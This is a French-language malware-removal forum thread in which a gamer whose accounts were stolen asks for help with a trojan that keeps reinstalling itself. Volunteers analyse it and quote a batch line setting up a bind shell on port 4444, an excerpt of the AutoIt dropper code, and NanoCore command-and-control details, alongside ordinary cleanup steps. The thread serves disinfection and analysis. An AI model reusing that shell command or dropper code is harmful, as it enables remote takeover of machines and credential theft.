[Résolu] Infection cheval de troie (TeamSpeak)

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

[Résolu] Infection cheval de troie (TeamSpeak)

Message par TomOne » 20 nov. 2015 16:34

Bonjour a tous , je n'ai pas l'habitude de poster pour cela car je fais très attention mais la il y a une infection qui persistent sur le pc et que je n'arrive pas a éradiquer.

Tout a commencer avec mon compte steam , je suis en jeu sur Cs Go et puis je m’aperçois que l'on m'a volé mon inventaire : il a volé mess mot de passe facebook ainsi que steam et email et a supprimer adobe reader ainsi qu'un fichier texte avec mes mot de passe dessus, j'ai bien sur eu le réflexe de prendre un pc sain et de changer tous mes mot de passe et de les noter dans un cahier maintenant ^^.

J'ai regarder un peu le fonctionnement du cheval de troie car cela fois 5 fois qu'il revient :

-tout d'abord il créer un fichier Chrome.bat et Thug.bat qui ne sont pas détecter car a chaque fois c'est je pense une variante qui revient sur le pc et les scanners de virustotal ne le détectent pas le jour même et ils se trouvent dans
C:\Users\mon nom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
je ne m'en suis pas rendu compte la première fois mais la j'ai vérifier et il se retéléchargent le lendemain ou quelques jour après.

https://www.virustotal.com/fr/file/817a ... 448028566/

https://www.virustotal.com/fr/file/41d7 ... 448028576/

SHA256: 41d70c421f61a38e229fe283701f140afe2ccaaee24bef01d1533ab6efc9ea71
Nom du fichier : Thug.bat
Ratio de détection : 5 / 55
Date d'analyse : 2015-11-20 14:09:36 UTC (il y a 2 heures, 1 minute)
0 0
Analyse

Antivirus Résultat Mise à jour
AVG BAT/Downloader 20151120
Agnitum HTML.Psyme.Gen 20151118
Panda JS/Psyme.gen 20151119
Qihoo-360 virus.bat.echovbsnet.a 20151120
TheHacker VBS/Psyme 20151119
Ensuite au demarage du pc le lendemain matin et non le jour mêmé se télécharge différent fichier au nom de Setup.exe et AutoIt.exe ainsi que csgoreg.exe et diverse commande dans cmd et les fichiers windows sont executé car une fenetre cmd dont je n'ai pas les échantillons.

Maintenant le problème c'est que malgré le fait que j'ai fais tous les logiciels de désinfections et que je supprime moi même les fichier non détecter , et bien le cheval de trois reviens et n'est pas détecter car je recois une nouvelle variante des fichiers nommés au dessus tout les jours et le plus bizard c'est uniquement lorsque j'allume le pc le matin, si je l'allume l'apres midi , le cheval de troie n'est pas présent. Donc je demande de l'aide pour pouvoir trouver comment se cheval de troie arrive a revenir malgré toute les désinfections que j'ai faite avec malwarebyte, hitmanpro,et plein d'autre que l'on utilise souvent pour l'infection. Pour information, j'ai kaspersky comme antivirus et cela dure depuis a commencer il y a environs 1 semaine et un ami a moi reçois exactement la même chose que moi, pourtant ont a tout les deux rien télécharger , windows et les programmes a jour.




Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 29277
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: Infection cheval de troie

Message par angelique » 20 nov. 2015 16:38

  • Télécharge sur ton Bureau pas ailleurs FRST.EXE:

    Image

    La page de téléchargement : http://www.bleepingcomputer.com/downloa ... scan-tool/
    Le téléchargement se fait à partir des boutons bleus Download – choisissez la version 32 ou 64 bits selon l’architecture de votre système.
    (Au pire si vous êtes en 64 bits et que vous prenez la version 32 bits, vous aurez un message disant que cette version ne peux fonctionner – cela n’endommage pas le système).

    !! Placez le programme sur le bureau et pas ailleurs!!
  • Execute FRST.EXE, accepte le disclaimer , Cochez tous les options et cliquez sur le bouton Scan.
    Le scan se lance, les éléments scannés apparaissent en haut.
  • Une fois le scan terminé, une popup vous le signale et deux rapports sont générés : FRST.txt et Addition.txt ( Ces deux rapports se trouvent sur le bureau avec le programme FRST. )


    Utilise le site http://pjjoint.malekal.com/ pour envoyer ton rapport, et poste le lien dans ta prochaine réponse pour analyse.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite


Malekal_morte
Site Admin
Site Admin
Messages : 95530
Inscription : 10 sept. 2005 13:57
Contact :

Re: Infection cheval de troie

Message par Malekal_morte » 20 nov. 2015 17:08

Le .bat ne sera pas détecté.
Apparemment ça permet d'ouvrir un shell sur l'ordinateur :
@echo pouaregq = "%public%\Setup.exe -L -p 4444 -e cmd.exe" >> %public%\test.vbs
J'ai envoyé le fichier aux antivirus, Kaspersky va surement ajouter une détection.

Supprimer les .bat
Touche Windows + R
tape %public%
Si tu vois un fichier Setup.exe - supprime le.

C'est un programme en Autoit :
SHA256: 5a10592edbe639ea55a51d36db77091a684017721af0474d851637d1fc4510e4
Nom du fichier : Setup.exe
Ratio de détection : 20 / 53
Date d'analyse : 2015-11-20 16:01:31 UTC (il y a 0 minute)

ALYac Trojan.GenericKD.2881495 20151120
AVG Autoit 20151120
AVware Trojan.Win32.Generic!BT 20151120
Ad-Aware Trojan.GenericKD.2881495 20151120
Arcabit Trojan.Generic.D2BF7D7 20151120
Avast Win32:Malware-gen 20151120
BitDefender Trojan.GenericKD.2881495 20151120
Cyren W32/GenBl.346C4815!Olympus 20151120
ESET-NOD32 a variant of Win32/TrojanDropper.Autoit.LE 20151120
Emsisoft Trojan.GenericKD.2881495 (B) 20151120
F-Secure Trojan.GenericKD.2881495 20151120
GData Trojan.GenericKD.2881495 20151120
Ikarus Trojan-Dropper.Win32.Autoit 20151120
McAfee Artemis!346C4815E270 20151120
McAfee-GW-Edition BehavesLike.Win32.Dropper.tc 20151120
MicroWorld-eScan Trojan.GenericKD.2881495 20151120
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20151120
Tencent Autoit.Trojan.Autoit.Liqu 20151120
VIPRE Trojan.Win32.Generic!BT 20151120
nProtect Trojan.GenericKD.2881495 20151120
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

Re: Infection cheval de troie

Message par TomOne » 20 nov. 2015 17:17

Justement a chaque fois que je supprime les fichiers bat , exe et vbs ben.. ils reviennent
Il doit rester une commande qui fait que tout se re-télécharge mais je vois pas ou.


ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 19:39

Re: Infection cheval de troie

Message par ѠOOT » 20 nov. 2015 19:02

Bonjour,

Malekal, avec ceci ça devrait aider à y voir plus clair..

Code : Tout sélectionner

If @OSVersion = "WIN_2003" Then Exit
If UBound(ProcessList("ZbDfYO.exe")) > 1 Then Exit
If @OSVersion = "WIN_2008" Then Exit
If @OSVersion = "WIN_2008R2" Then Exit
If @OSVersion = "WIN_2012" Then Exit
GUISetState(@SW_SHOW)
FileDelete(@AppDataCommonDir & "\" & "ZbDfYO.folder")
If @OSVersion = "WIN_2012R2" Then Exit
If @OSVersion = "WIN_2016" Then Exit
#EndRegion
#NoTrayIcon
$CUWAYYX = GUICreate("CuwaYYx", 300, 300, -99999, -99999, 0, 128)
FileDelete(@AppDataCommonDir & "\" & "ZbDfYO.path")
FileWrite(@AppDataCommonDir & "\ZbDfYO.folder", @ScriptDir)
FileWrite(@AppDataCommonDir & "\ZbDfYO.path", @ScriptFullPath)
FileInstall("ZbDfYO.exe", @AppDataCommonDir & "\ZbDfYO.exe")
FileInstall("ZbDfYO", @AppDataCommonDir & "\ZbDfYO")
FileInstall("ZbDfYO.au3", @AppDataCommonDir & "\ZbDfYO.au3")
ShellExecute(@AppDataCommonDir & "\ZbDfYO.exe", @AppDataCommonDir & "\ZbDfYO.au3", "", "", 0)
Pour la partie la plus intéressante...
http://pjjoint.malekal.com/files.php?re ... 128u8w15p8

Il y a des détections de solutions de sécurité ( Wireshark.exe ; dumpcap.exe ; tshark.exe ; Fiddler.exe ; .. ) , des anti-vm ( SandboxieRpcSs ; vmtoolsd.exe ; VboxService.exe ; ... ) etc.. on y voit également les points de chargements et les écritures de scripts vbs ; powershell ; ..

J'ai aussi noté la présence d'un composant NanoCore.

ps: Le maliciel comporte des bugs suivant la config de la victime.
ps: Les noms de fichiers sont hardcodés et c'est fixe "ZbDfYO".
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

Malekal_morte
Site Admin
Site Admin
Messages : 95530
Inscription : 10 sept. 2005 13:57
Contact :

Re: Infection cheval de troie

Message par Malekal_morte » 21 nov. 2015 13:04

Sur le rapport FRST, Windows n'est plus infecté.
Le Setup chez OVH a été supprimé, l'infection ne doit plus fonctionner.

Il reste quel problème ?
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

Re: Infection cheval de troie

Message par TomOne » 21 nov. 2015 14:05

Le probleme qui reste c'est qu'il semble que les fichiers Thug et Chrome .bat semble se remettre aléatoirement selon les jours dans le dossier de démarage dans utilisateur\nom\appdata\roaming\microsoft\windows\menu démarer\programme\démarage

Mais aujourd'hui quand j'ai allumé, ils ne sont pas remis..

Malekal_morte
Site Admin
Site Admin
Messages : 95530
Inscription : 10 sept. 2005 13:57
Contact :

Re: Infection cheval de troie

Message par Malekal_morte » 21 nov. 2015 17:44

Change tous tes mots de passe si cela n'a pas été fait =)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

Re: Infection cheval de troie

Message par TomOne » 21 nov. 2015 20:18

C'est la première chose que j'ai faite quand je m'en suis aperçu.
L'auteur de ce truc s'exprime en français car il a écrit des insultes depuis mon compte Facebook.

Sinon c'est venu tout seul, je ne sais pas comment , je suis sur que ce n'est pas par site internet, je n'ai rien ouvert ou cliqué. J'ai juste l'impression que l'on me l'a transféré je ne sais pas comment par une attaque réseau, comme si j'avais été ciblé avec mon ami ; il m'a dit qu'il avait exactement la même chose, en faite j'ai allumé le PC il y a une semaine et il y avait une fenêtre cmd qui c'était ouverte au démarrage et des erreurs sur des fichiers Windows. Je me suis dit que c'était bizarre j'ai donc lancé des scan avec Malwarebytes, TDSS Killer, FRST, ... et c'est avec lui que j'ai trouvé ces fameux fichiers bat et tout le reste. Vu qu'on joue a CSGO avec mon ami, je me demande si c'est pas quelqu'un qui se venge car on l'a trop laminé ^^.

ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 19:39

Re: Infection cheval de troie

Message par ѠOOT » 21 nov. 2015 20:52

Bonjour,

J'ai repris l'échantillon SHA-256: 5A10592EDBE639EA55A51D36DB77091A684017721AF0474D851637D1FC4510E4 sur lequel j'avais identifié la présence d'un composant NanoCore. A ce qu'on a pu constater, il n'y a pas ce type d'indicateurs sur votre machine donc vous n'avez pas eu ce fichier. Néanmoins, comme il allait être téléchargé, déchiffré et exécuté depuis les scripts VBS, ça nous renseigne un peu sur l'attaquant.

NanoCore chiffré sur le support de stockage.
Image

Configuration NanoCore.
Image

chickenkiller.com appartient au service "freedns" d'Afraid, un prestataire gratuit de redirections, entre autre.. virustotalscan est le nom du compte employé. La résolution IP pointe sur 185.20.184.204 de la plage 185.20.184.0/23 qui comprends 510 machines ( ( DeltaHost - deltahost.com.ua - ( Ukraine ) ) dépends de ( Serverius Holding B.V. ( Pays-Bas ) ) ). Le port 9044/TCP est ouvert et il y a trafic, c'est donc actif.

Vu qu'on a pas tous les éléments, difficile d'en savoir plus pour l'instant. Pour ce qui est des vols d'identifiants, c'est probablement de l'interception clavier / frappes enregistrées quant aux messages ( insultes, etc.. ) probablement des interactions réalisées en manipulant les fenêtres des applications.

A suivre...
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

Re: Infection cheval de troie

Message par TomOne » 21 nov. 2015 21:52

Cela veut dire que pour l'instant il y a toujours quelque chose de caché ou qu'il n'y a plus rien et que je peut l'utiliser en toute sécurité sans risque de me faire de nouveau voler ou de nouveau infecter ?

ѠOOT
Geek à longue barbe
Geek à longue barbe
Messages : 1043
Inscription : 28 déc. 2011 19:39

Re: Infection cheval de troie

Message par ѠOOT » 23 nov. 2015 09:18

Bonjour,

Impossible de garantir quoi que ce soit car dans les faits un système compromis doit être considéré comme "mort". Maintenant ce que vous pouvez faire, c'est installer et activer l'intercepteur de scripts AnalogX Script Defender. Les extensions de fichiers bloquées par défaut sont : .VBS | .VBE | .JS | .JSE | .HTA | .WSF | .WSH | .SHS | .SHB après ",.SHB" ajoutez ",.BAT,.CMD". Avec cette configuration, vous aurez une alerte à la moindre utilisation de scripts batch et VBScript. Et si vous avez un message de blocage, venez nous l'indiquer. Enfin, il serait judicieux d'installer et configurer un pare-feu digne de ce nom sur quelques jours pour contrôler les applications + connexions entrantes / sortantes. Contraignant quand on a pas l'habitude mais efficace.
‮Vous aimez la sécurité informatique ? Dopez vos neurones, achetez MISCMAG !
...nuf rof tsuJ

TomOne
newbie
newbie
Messages : 14
Inscription : 20 nov. 2015 15:32

Re: Infection cheval de troie

Message par TomOne » 26 nov. 2015 19:40

Bonjour

je penser être tranquille je vérifie tous les jours maintenant par paranoïa et les fichiers bat sont revenu tous seul, ils ont été créer aujourd’hui a 16h18 , il ne se sont pas exécuter car sans doute je n'ai pas encore redémarrer l'ordinateur. Que faire pour ces fichiers bat qui réapparaissent et qui ont peut être changé la source de téléchargement d'un autre cheval de troie ?

edit : et bien même après avoir supprimer hier soir les fichiers bat , ce matin en allumant le pc j'ai eu la fenêtre cmd avec des erreur puis kaspersky a supprimer test.vbs qui était un Trojan et les fichiers bat se sont remis tout seul pendant le démarrage ce matin je ne sais pas comment.

Malekal_morte
Site Admin
Site Admin
Messages : 95530
Inscription : 10 sept. 2005 13:57
Contact :

Re: Infection cheval de troie

Message par Malekal_morte » 27 nov. 2015 13:55

Tu n'as pas utilisé une clef USB ou disque dur externe ?
Refais un scan FRST pour voir et donne les rapports, voir si des trojans sont revenus.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas

Sécuriser son ordinateur (version courte)

Tutoriels Logiciels - Tutoriel Windows - Windows 10

Stop publicités - popups intempestives
supprimer-trojan.com : guide de suppression de malwares

Partagez malekal.com : n'hésitez pas à partager sur Facebook et GooglePlus les articles qui vous plaisent.


Répondre

Revenir vers « VIRUS : Supprimer/Desinfecter (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »